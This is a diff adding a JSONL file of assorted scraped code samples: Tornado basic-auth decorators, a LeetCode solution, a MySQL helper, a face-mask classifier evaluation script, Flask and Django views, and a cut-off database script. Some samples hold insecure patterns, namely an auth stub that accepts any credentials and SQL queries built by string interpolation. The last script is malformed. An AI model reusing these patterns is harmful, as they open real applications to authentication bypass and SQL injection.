diff --git "a/4939.jsonl" "b/4939.jsonl" new file mode 100644--- /dev/null +++ "b/4939.jsonl" @@ -0,0 +1,766 @@ +{"seq_id":"31070803","text":"import base64\r\n\r\n'''\r\nExample usage:\r\n\r\ndef check_credentials(user, pwd):\r\n return user == 'foo'\r\n\r\n@basic_auth(check_credentials)\r\nclass MyHandler(tornado.web.RequestHandler):\r\n pass\r\n \r\n'''\r\n\r\n\r\ndef basic_auth(auth_func=lambda *args, **kwargs: True, after_login_func=lambda *args, **kwargs: None, realm='Restricted'):\r\n \r\n def basic_auth_decorator(handler_class):\r\n def wrap_execute(handler_execute):\r\n def require_basic_auth(handler, kwargs):\r\n def create_auth_header():\r\n handler.set_status(401)\r\n handler.set_header('WWW-Authenticate', 'Basic realm=%s' % realm)\r\n handler._transforms = []\r\n handler.finish()\r\n\r\n auth_header = handler.request.headers.get('Authorization')\r\n\r\n if auth_header is None or not auth_header.startswith('Basic '):\r\n create_auth_header()\r\n else:\r\n auth_decoded = base64.decodestring(auth_header[6:])\r\n user, pwd = auth_decoded.split(':', 2)\r\n\r\n if auth_func(user, pwd):\r\n after_login_func(handler, kwargs, user, pwd)\r\n else:\r\n create_auth_header()\r\n\r\n def _execute(self, transforms, *args, **kwargs):\r\n require_basic_auth(self, kwargs)\r\n return handler_execute(self, transforms, *args, **kwargs)\r\n\r\n return _execute\r\n\r\n handler_class._execute = wrap_execute(handler_class._execute)\r\n return handler_class\r\n \r\n return basic_auth_decorator\r\n\r\n \r\n #=================================================================\r\n \r\n \r\n \r\n'''\r\nExample usage:\r\n\r\n@httpauth\r\nclass SessionCreateHandler(tornado.web.RequestHandler):\r\n @allowedRole('administrator')\r\n def get(self):\r\n # Contains user found in previous auth\r\n print self.request.headers.get('auth')\r\n self.write('ok')\r\n \r\n-or-\r\n\r\n@httpauth\r\nclass SessionCreateHandler(tornado.web.RequestHandler):\r\n @allowedRole(['administrator', 'super-administrator'])\r\n def get(self):\r\n # Contains user found in previous auth\r\n print self.request.headers.get('auth')\r\n self.write('ok')\r\n''' \r\n \r\n \r\nimport base64\r\n \r\ndef _checkAuth(login, password):\r\n ''' Check user can access or not to this element '''\r\n # TODO: return None if user is refused\r\n # TODO: do database check here, to get user.\r\n return {\r\n 'login': 'okay',\r\n 'password': 'okay',\r\n 'role': 'okay'\r\n }\r\n \r\ndef httpauth(handler_class):\r\n ''' Handle Tornado HTTP Basic Auth '''\r\n def wrap_execute(handler_execute):\r\n def require_auth(handler, kwargs):\r\n auth_header = handler.request.headers.get('Authorization')\r\n \r\n if auth_header is None or not auth_header.startswith('Basic '):\r\n handler.set_status(401)\r\n handler.set_header('WWW-Authenticate', 'Basic realm=Restricted')\r\n handler._transforms = []\r\n handler.finish()\r\n return False\r\n \r\n auth_decoded = base64.decodestring(auth_header[6:])\r\n login, password = auth_decoded.split(':', 2)\r\n auth_found = _checkAuth(login, password)\r\n \r\n if auth_found is None:\r\n handler.set_status(401)\r\n handler.set_header('WWW-Authenticate', 'Basic realm=Restricted')\r\n handler._transforms = []\r\n handler.finish()\r\n return False\r\n else:\r\n handler.request.headers.add('auth', auth_found)\r\n \r\n return True\r\n \r\n def _execute(self, transforms, *args, **kwargs):\r\n if not require_auth(self, kwargs):\r\n return False\r\n return handler_execute(self, transforms, *args, **kwargs)\r\n \r\n return _execute\r\n \r\n handler_class._execute = wrap_execute(handler_class._execute)\r\n return handler_class\r\n\r\n\r\n# The _checkAuth should return a user object, and this\r\n# configure which property from that objet get the 'role'\r\n_userRolePropertyName = 'role'\r\n \r\ndef _checkRole(role, roles):\r\n ''' Check given role is inside or equals to roles '''\r\n # Roles is a list not a single element\r\n if isinstance(roles, list):\r\n found = False\r\n for r in roles:\r\n if r == role:\r\n found = True\r\n break\r\n \r\n if found == True:\r\n return True\r\n \r\n # Role is a single string\r\n else:\r\n if role == roles:\r\n return True\r\n \r\n return False\r\n \r\n \r\ndef allowedRole(roles = None):\r\n def decorator(func):\r\n def decorated(self, *args, **kwargs):\r\n user = self.request.headers.get('auth')\r\n \r\n # User is refused\r\n if user is None:\r\n raise Exception('Cannot proceed role check: user not found')\r\n \r\n role = user[_userRolePropertyName]\r\n \r\n if _checkRole(role, roles) == False:\r\n self.set_status(403)\r\n self._transforms = []\r\n self.finish()\r\n return None\r\n \r\n return func(self, *args, **kwargs)\r\n return decorated\r\n return decorator\r\n \r\n \r\ndef refusedRole(roles = None):\r\n def decorator(func):\r\n def decorated(self, *args, **kwargs):\r\n user = self.request.headers.get('auth')\r\n \r\n # User is refused\r\n if user is None:\r\n raise Exception('Cannot proceed role check: user not found')\r\n \r\n role = user[_userRolePropertyName]\r\n \r\n if _checkRole(role, roles) == True:\r\n self.set_status(403)\r\n self._transforms = []\r\n self.finish()\r\n return None\r\n \r\n return func(self, *args, **kwargs)\r\n return decorated\r\n return decorator\r\n","sub_path":"WebServices/BasicAuthentication.py","file_name":"BasicAuthentication.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"182297491","text":"# https://oj.leetcode.com/problems/max-points-on-a-line/\n\nclass Solution:\n # @param points, a list of Points\n # @return an integer\n def maxPoints(self, points):\n n = len(points)\n if n == 0:\n return 0\n if n == 1:\n return 1\n return max([self.maxCount(points, p) for p in points])\n\n def maxCount(self, points, p):\n d = {}\n cnt = 0\n for p1 in points:\n if p1.x == p.x and p1.y == p.y:\n cnt += 1\n continue\n dx, dy = p1.x - p.x, p1.y - p.y\n g = self.gcd(dx, dy)\n slop = (dx / g, dy / g)\n if slop not in d:\n d[slop] = 0\n d[slop] += 1\n\n if len(d) == 0:\n return cnt\n\n return max(d.values()) + cnt\n\n def gcd(self, a, b):\n if b == 0:\n return a\n if a == 0:\n return b\n return self.gcd(b, a % b)\n","sub_path":"leetans/maxPoints.py","file_name":"maxPoints.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"23780984","text":"import numpy as np\nimport matplotlib.pyplot as plt \n\n\nloss = []\npearson = []\nwith open('val.log','r') as f:\n for i in f:\n # print(i.split('\\t')[1].split('(')[1].split(',')[0])\n # exit()\n pearson.append(float(i.split('\\t')[2]))\n loss.append(float(i.split('\\t')[1].split('(')[1].split(',')[0])*25)\n# print(pearson)\n# print(loss)\n# exit()\n\nx=np.arange(105)\n\n\nl1=plt.plot(x[:22],pearson[:22],'-',label='Pearson')\n# l1=plt.plot(x[:22],loss[:22],'-',label='Loss')\n\n\n# l2=plt.plot(x2,y2,'g--',label='type2')\n# l3=plt.plot(x3,y3,'b--',label='type3')\n# plt.plot(x,loss,'b.')#,x2,y2,'g+-',x3,y3,'b^-')\nplt.title('Validation Evaluation')\nplt.xlabel('Epoch')\nplt.ylabel('Evaluation')\nplt.legend()\nplt.show()\n\n","sub_path":"code/stswp/result/0.60 48--64/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435317529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport pymysql\nimport configparser\nimport common_util\n\n# Create your models here.\n\ndef get_db_connect(logger):\n \"\"\"\n MySQL Connection\n :return: DB object\n \"\"\"\n try:\n conf_file = common_util.conf_file\n parser = configparser.RawConfigParser()\n parser.read(conf_file)\n db = pymysql.connect(\n host = common_util.config.get('sql', 'host'),\n user = common_util.config.get('sql', 'user'),\n passwd = common_util.config.get('sql', 'passwd'),\n db = common_util.config.get('sql', 'db')\n )\n return db\n except Exception as e:\n logger.msg_logger(\"Error get_db_connect : \" + str(e))\n raise Exception(str(e))\n\n\ndef insert_sql(logger, table_name, data):\n try:\n ret_status = False\n db = get_db_connect(logger)\n cursor = db.cursor()\n query = 'insert into %s(%s) values(%s)' % (table_name, ','.join([key for key in data]),','.join(['%s' for _ in data]))\n values = tuple([value for key,value in data.items()])\n cursor.execute(query,(values))\n db.commit()\n logger.msg_logger('>>>>>>>> MYSQL Insert Success : %s || %s' % (query, str(data)))\n ret_status = True\n except Exception as e:\n logger.msg_logger('Error insert_sql : %s | %s'%(str(e),query))\n finally:\n if db : db.close()\n return ret_status\n\n\ndef find_sql(logger, table_name,filters,columns=''):\n try:\n data = None\n db = get_db_connect(logger)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n if columns:\n columns = ','.join(columns)\n else:\n columns = '*'\n\n params = ''\n for key,value in filters.items():\n params += \"%s = '%s' AND \"%(key,value)\n params = params[:-5] # Removing AND\n\n query = 'SELECT %s FROM %s WHERE %s'%(columns,table_name,params)\n cursor.execute(query)\n data = cursor.fetchall()\n except Exception as e:\n logger.msg_logger('find_sql : %s | %s'%(str(e),query))\n finally:\n if db: db.close()\n return data\n\n\n","sub_path":"eth_auxpay_py/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"249426876","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.preprocessing.image import img_to_array, load_img\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.models import load_model\nfrom detector import violaJones_face_detection, dnn_face_detection\nimport os\nfrom sklearn.metrics import classification_report, precision_recall_curve, \\\n roc_auc_score, average_precision_score, auc\nfrom sklearn.preprocessing import LabelBinarizer\nfrom tensorflow.keras.utils import to_categorical\n\n# face detection options (Just to make the code clean)\nfd_options = {\n 'ViolaJones': violaJones_face_detection,\n 'DNN': dnn_face_detection\n}\n# default classifier model and detection method\nDEFAULT_CLASSIFIER_PATH = \"experiments/classifier3/classifier3.model\"\nDEFAULT_TEST_DIRECTORIES = [\"data/test/test_images/\",\n \"data/test/test_images2/\",\n \"data/test/jean_louis_mask_dataset/\",\n \"data/test/Pamir_Amiry_Data_Set/\",\n \"data/test/Aggrim_Arora_Data/\",\n \"data/test/christian_augustyn_data\",\n \"data/test/martin_dataset\",\n ]\n\n\n# Note: THIS FUNCTION IS TO EVALUATE THE MODELS AND COMPARE THEM\n# for all images in the test directories,\n# detects faces and labels as mask or no mask with the provided model\n# then compares classifier output with the real labels at 0.5 threshold and prints success rate\n# returns true labels and classifier output for further investigation.\ndef test_model_on_test_images(classifier_path=None, fd_method='DNN', test_directories=None,\n PR_curve=False, threshold=0.5):\n categories = [\"with_mask\", \"without_mask\"]\n\n # set directory of the test data\n if test_directories is not None:\n test_dir = test_directories\n else:\n test_dir = DEFAULT_TEST_DIRECTORIES\n\n # set the face detector function\n face_detect = fd_options[fd_method]\n\n # Load the model\n if classifier_path is None:\n model = load_model(DEFAULT_CLASSIFIER_PATH)\n else:\n model = load_model(classifier_path)\n\n # real labels\n labels = []\n # predicted labels\n pred_labels = []\n # loop through all the images in the test folder detect and label faces and save predicted labels and real ones\n for directory in test_dir:\n for category in categories:\n path = os.path.join(directory, category)\n for img in os.listdir(path):\n\n img_path = os.path.join(path, img)\n try:\n image = load_img(img_path) # load the image\n except:\n continue\n image = img_to_array(image)\n faces = face_detect(image)\n for x1, y1, x2, y2 in faces:\n # crop the detected face from the frame and preprocess the image\n face = image[y1:y2, x1:x2, :]\n if face.shape[0] == 0 or face.shape[1] == 0:\n continue\n face = cv2.resize(face, (224, 224))\n face = img_to_array(face)\n face = preprocess_input(face) # preprocessing the data for the mobileNetV2 CNN\n face = np.expand_dims(face, axis=0)\n\n # predicted label\n predIdxs = model.predict(face)[0]\n pred_labels.append(predIdxs)\n # real label\n labels.append(category)\n\n lb = LabelBinarizer()\n labels = lb.fit_transform(labels)\n labels = to_categorical(labels)\n # real and predicted label\n labels = np.array(labels)\n pred_labels = np.array(pred_labels)\n pred_labels_t = np.zeros(pred_labels.shape[0])\n pred_labels_t[pred_labels[:, 1] > threshold] = 1\n print(classification_report(labels.argmax(axis=1), pred_labels_t))\n # for example for label 0:\n # precision: the number of correcly reported 0s/ the number of all reported 0s\n # (what percent of algorhtm's 0s were real 0s)\n # recall: the number of correcly reported 0s/ the number of all 0s\n # (what percent of data's 0s the algorithm caught)\n if PR_curve:\n precision, recall, thresholds = \\\n precision_recall_curve(y_true=labels.argmax(axis=1), probas_pred=pred_labels[:, 0], pos_label=0)\n plt.plot(recall, precision)\n plt.show()\n\n return labels, pred_labels\n\n\ndef script():\n # the desired recall threshold\n T = 0.95\n\n # load the models and get the predictions.\n C123_path = \"./experiments/classifier123/classifier123.model\"\n C5_path = \"./experiments/classifier5/classifier5.model\"\n C_all_path = \"./experiments/classifier_all/classifier_all.model\"\n print(\"C-123 with threshold 0.5\")\n lbls, C123_probs = test_model_on_test_images(C123_path)\n print(\"C-5 with threshold 0.5\")\n lbls, C5_probs = test_model_on_test_images(C5_path)\n print(\"C-all with threshold 0.5\")\n lbls, C_all_probs = test_model_on_test_images(C_all_path)\n\n # calculate precision and recall at different thresholds\n precision123, recall123, thresholds123 = \\\n precision_recall_curve(y_true=lbls.argmax(axis=1), probas_pred=C123_probs[:, 1], pos_label=1)\n precision5, recall5, thresholds5 = \\\n precision_recall_curve(y_true=lbls.argmax(axis=1), probas_pred=C5_probs[:, 1], pos_label=1)\n precision_all, recall_all, thresholds_all = \\\n precision_recall_curve(y_true=lbls.argmax(axis=1), probas_pred=C_all_probs[:, 1], pos_label=1)\n\n # calculate F1 score at different thresholds\n F123 = 2 * precision123 * recall123 / (precision123 + recall123)\n F5 = 2 * precision5 * recall5 / (precision5 + recall5)\n F_all = 2 * precision_all * recall_all / (precision_all + recall_all)\n\n # find maximum F1 score index\n maxFind123 = F123.argmax()\n maxFind5 = F5.argmax()\n maxFind_all = F_all.argmax()\n\n # print information of the point with maximum F1 score\n print(\"maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n F123[maxFind123],\n F5[maxFind5],\n F_all[maxFind_all])\n )\n print(\"threshold at maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n thresholds123[maxFind123],\n thresholds5[maxFind5],\n thresholds_all[maxFind_all])\n )\n print(\"recall at maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n recall123[maxFind123],\n recall5[maxFind5],\n recall_all[maxFind_all])\n )\n print(\"precisions at maximum F1 score is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\".format(\n precision123[maxFind123],\n precision5[maxFind5],\n precision_all[maxFind_all])\n )\n\n # finding T sensitivity threshold index\n opt_ind123 = np.where(recall123 >= T)\n opt_ind5 = np.where(recall5 >= T)\n opt_ind_all = np.where(recall_all >= T)\n\n o123 = (opt_ind123[0][-1])\n o5 = (opt_ind5[0][-1])\n o_all = (opt_ind_all[0][-1])\n\n # print information of the point with desired recall\n print(\"threshold for minimum {} recall is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\"\n .format(T,\n thresholds123[o123],\n thresholds5[o5],\n thresholds_all[o_all])\n )\n print(\"recall for minimum {}% recall is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\"\n .format(T,\n recall123[o123],\n recall5[o5],\n recall_all[o_all])\n )\n print(\"precision for minimum {}% recall is:\\nC-123:{}\\nC-5:{}\\nC-all:{}\\n\"\n .format(T,\n precision123[o123],\n precision5[o5],\n precision_all[o_all])\n )\n\n # draw pr curves\n fig, ax = plt.subplots()\n ax.plot(recall123[:-1], precision123[:-1], label=\"C-123\", color='c')\n ax.plot(recall5[:-1], precision5[:-1], label=\"C-5\", color='m')\n ax.plot(recall_all[:-1], precision_all[:-1], label=\"C-all\", color='y')\n ax.plot(recall123[o123], precision123[o123], 'xc', label=\"C-123 {} sensitivity point\".format(T))\n ax.plot(recall5[o5], precision5[o5], 'xm', label=\"C-5 {} sensitivity point\".format(T))\n ax.plot(recall_all[o_all], precision_all[o_all], 'xy', label=\"C-all {} sensitivity point\".format(T))\n ax.plot(recall123[maxFind123], precision123[maxFind123], '*c', label=\"C-123 maximum F1 point\")\n ax.plot(recall5[maxFind5], precision5[maxFind5], '*m', label=\"C-5 maximum F1 point\")\n ax.plot(recall_all[maxFind_all], precision_all[maxFind_all], '*y', label=\"C-all maximum F1 point\")\n ax.axvline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_xticks(list(ax.get_xticks()[:-1]) + [0.97])\n ax.set_xlim([0.5, 1])\n ax.legend()\n ax.set_xlabel(\"Recall\")\n ax.set_ylabel(\"Precision\")\n fig.savefig(\"./prcurves.png\")\n fig.show()\n\n # individual precision and recall against threshold\n fig, ax = plt.subplots()\n ax.plot(thresholds123, precision123[:-1], label=\"precision\")\n ax.plot(thresholds123, recall123[:-1], label=\"recall\")\n ax.plot(thresholds123, F123[:-1], label=\"F1 score\")\n ax.plot(thresholds123[o123], precision123[o123], 'xk', label=\"recall is at least {}\".format(T))\n ax.plot(thresholds123[o123], recall123[o123], 'xk')\n ax.plot(thresholds123[o123], F123[o123], 'xk')\n ax.plot(thresholds123[maxFind123], precision123[maxFind123], 'xr', label=\"maximum F1 score\")\n ax.plot(thresholds123[maxFind123], recall123[maxFind123], 'xr')\n ax.plot(thresholds123[maxFind123], F123[maxFind123], 'xr')\n ax.set_xlabel(\"Threshold\")\n ax.legend()\n ax.set_title(\"C-123 precision and recall curve\")\n ax.axhline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_yticks(list(ax.get_yticks()[:-1]) + [0.97])\n fig.savefig(\"./p&rcurve_c_123.png\")\n fig.show()\n\n fig, ax = plt.subplots()\n ax.plot(thresholds5, precision5[:-1], label=\"precision\")\n ax.plot(thresholds5, recall5[:-1], label=\"recall\")\n ax.plot(thresholds5, F5[:-1], label=\"F1 score\")\n ax.plot(thresholds5[o5], precision5[o5], 'xk', label=\"recall is at least {}\".format(T))\n ax.plot(thresholds5[o5], recall5[o5], 'xk')\n ax.plot(thresholds5[o5], F5[o5], 'xk')\n ax.plot(thresholds5[maxFind5], precision5[maxFind5], 'xr', label=\"maximum F1 score\")\n ax.plot(thresholds5[maxFind5], recall5[maxFind5], 'xr')\n ax.plot(thresholds5[maxFind5], F5[maxFind5], 'xr')\n ax.set_xlabel(\"Threshold\")\n ax.legend()\n ax.set_title(\"C-5 precision and recall curve\")\n ax.axhline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_yticks(list(ax.get_yticks()[:-1]) + [0.97])\n fig.savefig(\"./p&rcurve_c_5.png\")\n fig.show()\n\n fig, ax = plt.subplots()\n ax.plot(thresholds_all, precision_all[:-1], label=\"precision\")\n ax.plot(thresholds_all, recall_all[:-1], label=\"recall\")\n ax.plot(thresholds_all, F_all[:-1], label=\"F1 score\")\n ax.plot(thresholds_all[o_all], precision_all[o_all], 'xk', label=\"recall is at least {}\".format(T))\n ax.plot(thresholds_all[o_all], recall_all[o_all], 'xk')\n ax.plot(thresholds_all[o_all], F_all[o_all], 'xk')\n ax.plot(thresholds_all[maxFind_all], precision_all[maxFind_all], 'xr', label=\"maximum F1 score\")\n ax.plot(thresholds_all[maxFind_all], recall_all[maxFind_all], 'xr')\n ax.plot(thresholds_all[maxFind_all], F_all[maxFind_all], 'xr')\n ax.set_xlabel(\"Threshold\")\n ax.legend()\n ax.set_title(\"C-all precision and recall curve\")\n ax.axhline(T, linestyle='--', color='k', linewidth=0.5)\n # ax.set_yticks(list(ax.get_yticks())[:-1] + [0.97])\n fig.savefig(\"./p&rcurve_c_all.png\")\n fig.show()\n\n # evaluate the models with more generic metrics\n # (over the whole threshold range, which is better on average?)\n print(\"general evaluation metrics:\")\n print(\"AP C-123: {}\"\n .format(average_precision_score(y_true=lbls.argmax(axis=1),\n y_score=C123_probs[:, 1],\n pos_label=1)))\n print(\"AP C-5: {}\"\n .format(average_precision_score(y_true=lbls.argmax(axis=1),\n y_score=C5_probs[:, 1],\n pos_label=1)))\n print(\"AP C-all: {}\"\n .format(average_precision_score(y_true=lbls.argmax(axis=1),\n y_score=C_all_probs[:, 1],\n pos_label=1)))\n print()\n print(\"AUC-ROC C-123: {}\"\n .format(roc_auc_score(y_true=lbls.argmax(axis=1),\n y_score=C123_probs[:, 1])))\n print(\"AUC-ROC C-5: {}\"\n .format(roc_auc_score(y_true=lbls.argmax(axis=1),\n y_score=C5_probs[:, 1])))\n print(\"AUC-ROC C-all: {}\"\n .format(roc_auc_score(y_true=lbls.argmax(axis=1),\n y_score=C_all_probs[:, 1])))\n print()\n print(\"AUC-PR C-123: {}\"\n .format(auc(recall123, precision123)))\n print(\"AUC-PR C-5: {}\"\n .format(auc(recall5, precision5)))\n print(\"AUC_PR C-all: {}\"\n .format(auc(recall_all, precision_all)))\n print()\n\n\nif __name__ == '__main__':\n script()\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":13239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9791762","text":"#!/nokia/apps/tww/@sys/bin/python\n#-*- coding=utf-8 -*-\n\nimport binascii, string, sys, os, getopt\n\nversion = int(sys.version[0])\n\ndef getStrings(s):\n a,b = s.split(' \"')\n b = b.strip().replace('\"', \"\")\n if b.endswith(\"0000\"):\n b = b[:-4]\n if version == 3:\n b = bytes.fromhex(b)\n else:\n b = binascii.a2b_hex(b)\n return a.strip(), b.decode(\"utf-16-be\").encode('utf-8')\n\ndef searchStr(a,b, s):\n \"\"\"\n if s is empty, return True to display everyone\n \"\"\"\n if not s:\n return True\n\n if a.lower().find(s.lower()) != -1:\n return True\n else:\n return False\n\ndef usage():\n print(\"\"\"Usage: \n decode_prompt.py ppm/xxxxx.dat [search string (ignorecase)]\n i.e.: python decode_prompt.py english-gb_english-us.txt.dat call_repeat\n\n this script will save \"result.txt\" file in current directory.\n\"\"\")\n\ndef parse_argv(argv):\n try:\n opts, args = getopt.getopt(argv, \"hs\", [\"help\", \"screen\"])\n out = {}\n\n if len(args) == 1:\n out['f'] = args[0]\n elif len(args) == 2:\n out['f'] = args[0]\n out['s'] = args[1]\n else:\n usage()\n sys.exit(0)\n return out\n except getopt.GetoptError:\n usage()\n return out\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n param = parse_argv(sys.argv[1:]) \n\n lines = open(param['f']).readlines()\n findStr = ''\n if version == 3:\n if 's' in list(param.keys()):\n findStr = param['s']\n else:\n if 's' in param.keys():\n findStr = param['s']\n\n result = []\n for i in range(5, len(lines)):\n a,b = getStrings(lines[i])\n if searchStr(a, b, findStr):\n if version == 3:\n result.append(a+\" = \"+b.decode('utf-8'))\n else:\n result.append(a+\" = \"+b)\n\n if version == 3:\n open(\"./result.txt\", \"wb\").write(\"\\n\".join(result).encode(\"utf-8\"))\n else:\n open(\"./result.txt\", \"wb\").write(\"\\n\".join(result))\n print(\"the result has saved in ./result.txt\")\n else:\n usage()\n\n\n","sub_path":"py/decode_prompt.py","file_name":"decode_prompt.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646688894","text":"from flask import Flask, render_template, request\nimport os\n\n# EB looks for an 'application' callable by default.\n# EB looks for an 'application' callable by default.\nproject_root = os.path.dirname(__file__)\ntemplate_path = os.path.join(project_root, 'Templates')\napplication = Flask(__name__, template_folder=template_path, static_url_path=\"\", static_folder=\"Static\")\n\n# use decorators to link the function to a url\n@application.route('/', methods=['GET', 'POST'])\ndef home():\n\tif request.method == 'GET':\n\t\treturn render_template('index.html')\n\t\n@application.errorhandler(404)\ndef page_not_found(e):\n return render_template('index.html'), 404\n\n# run the app.\nif __name__ == \"__main__\":\n\t# Setting debug to True enables debug output. This line should be removed before deploying a production app.\n\tapplication.run(debug=False) ","sub_path":"eb-flask/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21807842","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView\nfrom .models import Entry\nfrom .forms import EntryCreationForm, EditorForm\nfrom django.utils import timezone\nfrom django.http import JsonResponse\n\ndef entry_required(f):\n def wrap_function(request, entry_id, *args, **kwargs):\n try:\n entryInstance = Entry.objects.get(uuid=entry_id, author=request.user)\n except:\n return redirect('missing')\n return f(request, entry_id, *args, **kwargs, entryInstance=entryInstance)\n return wrap_function\n\n@login_required\ndef dashboard(request):\n entryList = Entry.objects.filter(author=request.user).order_by('dateTime')\n return render(request, 'diary/dashboard.html', {'entry_list': entryList})\n\n@login_required\n@entry_required\ndef entry(request, entry_id, entryInstance):\n return render(request, 'diary/entry.html', {'entry': entryInstance})\n\n@login_required\ndef create_entry(request):\n if request.method == 'POST':\n form = EntryCreationForm(request.POST)\n if form.is_valid():\n newEntry = Entry(title=form.cleaned_data['title'], location=form.cleaned_data['location'], author=request.user)\n newEntry.save()\n return redirect('diary:entry', entry_id=newEntry.uuid)\n else:\n form = EntryCreationForm()\n\n return render(request, 'diary/create_entry.html', {'date_created': timezone.now(), 'form': form})\n\n@login_required\n@entry_required\ndef edit(request, entry_id, entryInstance):\n if request.method == 'POST':\n # Is no error, then it is an autosave update\n try:\n request.POST['is_autosave_update']\n\n entryInstance.content = request.POST['content']\n entryInstance.save()\n print('saved: ' + entryInstance.content)\n return JsonResponse(data={}, status=200)\n\n except KeyError:\n form = EditorForm(request.POST)\n if form._errors:\n return redirect('missing', {'error': form._errors})\n\n content = form.data['editor']\n # files = form.files\n entryInstance.content = content\n entryInstance.save()\n return redirect('diary:entry', entry_id=entryInstance.uuid)\n else:\n form = EditorForm()\n return render(request, 'diary/edit.html', {'entry': entryInstance, 'form': form, 'initial_content': entryInstance.content})","sub_path":"diary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328103783","text":"from sqlalchemy import create_engine,MetaData, select,update\nfrom sqlalchemy.orm import Session\n# import pandas as pd \n# import numpy\nimport csv\nimport math\nfrom sqlalchemy import and_\nfrom sqlalchemy.engine.default import DefaultDialect\nfrom sqlalchemy.sql.sqltypes import String, DateTime, NullType\nfrom sqlalchemy.sql import func,and_\nimport datetime\nimport email\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom decouple import config\n# import pdb; pdb.set_trace()\n\n\ndef iso_data_fetch_calc():\n print(\"fn inside\")\n # engine = create_engine(\"mysql+pymysql://\",config('iso_calc_user'),\":\",config('iso_calc_localhost'),\"/\",config('database'))\n engine = create_engine(\"mysql+pymysql://\",config('user'),\":\",config('password'),\"@\",config('localhost'),\"/\",config('database'))\n print(\"add\")\n metadata = MetaData()\n metadata.reflect(bind = engine)\n conn = engine.connect()\n validation_dct={}\n noondata = metadata.tables['NOONDATA']\n print(\"bh\")\n iso_parameter = metadata.tables['ISOPARAMETER']\n vessel_details=metadata.tables['VESSELDETAIL']\n validation=metadata.tables['ISO_VALIDATION']\n #for previous data also cmnt # if(obj_noon[17]!='NULL' and obj_noon[17]!=0):\n # \tiso_noon_stw=float(obj_noon[17])\n # else: at line 139\n # noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME]).where(and_(noondata.c.Vessel_Name=='MNP',noondata.c.CAA==0)).fetchall()\n #for new data having stw\n lst=[]\n noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME,noondata.c.STW,noondata.c.REPORT_DATE_TIME]).where(noondata.c.REPORT_DATE_TIME>='2020-01-01 00:00:00')).fetchall()\n\n # noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME,noondata.c.STW]).where(and_(noondata.c.Vessel_Name=='PCO',noondata.c.CAA==0))).fetchall()\n \n # noon_parameter = 